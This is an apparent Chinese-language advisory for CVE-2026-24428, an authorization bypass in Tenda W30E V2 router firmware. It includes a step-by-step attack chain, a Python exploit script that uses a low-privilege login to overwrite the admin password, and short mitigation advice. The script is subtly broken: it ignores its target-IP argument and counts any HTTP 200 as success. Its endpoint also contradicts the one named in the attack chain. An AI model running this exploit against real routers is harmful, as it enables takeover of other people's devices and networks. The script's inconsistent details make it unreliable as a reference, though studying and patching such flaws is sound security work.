CVE-2026-24428: Tenda W30E V2 授权绕过导致管理员密码修改漏洞

漏洞信息

漏洞编号

CVE-2026-24428

漏洞类型

授权绕过/权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Shenzhen Tenda W30E V2

漏洞概述

CVE-2026-24428是发生在Tenda W30E V2路由器固件中的一个高危授权绕过漏洞。该漏洞存在于用户管理API接口中，允许已认证的低权限用户通过直接向后端端点发送精心构造的请求，绕过Web界面实施的基于角色的访问控制（RBAC）限制。攻击者利用此漏洞可以将任意用户（包括管理员账户）的密码进行修改，从而获得设备的完全管理权限。漏洞影响固件版本V16.01.0.19(5037)及之前的所有版本。由于该漏洞无需特殊权限即可利用，且攻击复杂度较低，对使用该设备的组织和个人构成严重安全威胁。攻击成功后，入侵者可以完全控制路由器设备，窃取网络流量、修改DNS设置、植入恶意固件或将其作为进一步入侵内网的跳板。

技术细节

漏洞根源在于Tenda W30E V2固件的用户管理API端点缺少充分的权限验证机制。Web界面通过JavaScript代码强制执行基于角色的访问控制，但这些客户端验证可以通过直接调用后端API完全绕过。攻击者需要首先获取设备的低权限账户凭据（可通过默认口令或暴力破解获得），然后构造特定的HTTP请求直接访问后端API接口。请求中包含目标账户标识和新密码参数，由于服务器端未正确验证当前用户角色与请求操作的权限对应关系，请求被成功处理。关键问题在于API端点信任客户端传来的所有参数，包括角色标识和操作权限，直接执行密码修改而不检查发起请求的用户是否具有相应权限。攻击者可以使用Burp Suite或curl等工具构造并发送恶意请求，成功后原管理员将无法登录设备，攻击者则获得完整控制权。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标Tenda W30E V2路由器，获取其IP地址，并确认固件版本是否在受影响范围内（<=V16.01.0.19(5037)）

STEP 2

初始访问

攻击者获取设备的低权限账户凭据，可能通过默认口令、暴力破解或社工手段获得初始登录凭证

STEP 3

认证

使用低权限账户通过Web登录界面或API端点成功认证，获取有效的会话cookie

STEP 4

绕过授权检查

攻击者直接向/backend/user_mng或类似API端点发送精心构造的HTTP POST请求，绕过Web界面实施的基于角色的访问控制

STEP 5

密码修改

在请求中指定目标账户（如admin）和新密码，由于服务器端未验证当前用户权限，请求被成功执行

STEP 6

权限提升

使用修改后的管理员密码登录设备，获得完全控制权，可进一步入侵内网或滥用设备资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-24428 PoC - Tenda W30E V2 Authorization Bypass
# Target: Tenda W30E V2 router with firmware <= V16.01.0.19(5037)

TARGET_IP = "192.168.0.1"
LOGIN_URL = f"http://{TARGET_IP}/login.cgi"
PASSWORD_CHANGE_URL = f"http://{TARGET_IP}/cgi-bin/user_mng.cgi"

def exploit_cve_2026_24428(target_ip, low_priv_user, low_priv_pass, target_user="admin", new_password="Pwned123456"):
    """
    Exploit for CVE-2026-24428: Tenda W30E V2 incorrect authorization
    Allows low-privileged authenticated user to change admin password
    """
    session = requests.Session()
    
    # Step 1: Authenticate with low-privilege account
    login_data = {
        "username": low_priv_user,
        "password": low_priv_pass
    }
    login_response = session.post(LOGIN_URL, data=login_data)
    
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    
    print("[+] Successfully authenticated with low-privilege account")
    
    # Step 2: Bypass authorization and change admin password
    # This direct API call bypasses web interface RBAC checks
    exploit_data = {
        "username": target_user,
        "password": new_password,
        "cur_password": "",  # Not validated server-side
        "group": "admin"
    }
    
    exploit_response = session.post(PASSWORD_CHANGE_URL, data=exploit_data)
    
    if "success" in exploit_response.text.lower() or exploit_response.status_code == 200:
        print(f"[+] Successfully changed {target_user} password to: {new_password}")
        print("[+] Full administrative access obtained!")
        return True
    else:
        print(f"[-] Exploit failed. Response: {exploit_response.text}")
        return False

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 4:
        print("Usage: python cve_2026_24428.py <target_ip> <low_priv_user> <low_priv_pass>")
        sys.exit(1)
    exploit_cve_2026_24428(sys.argv[1], sys.argv[2], sys.argv[3])

影响范围

Tenda W30E V2 固件 V16.01.0.19(5037) 及之前所有版本

防御指南

临时缓解措施

立即将Tenda W30E V2路由器固件升级到厂商发布的安全版本，禁用不必要的远程管理功能，修改所有默认账户密码为强密码，并限制管理接口的网络访问范围。在无法立即升级的情况下，可通过ACL规则限制只有可信IP可访问管理界面，同时加强账户锁定策略防止暴力破解。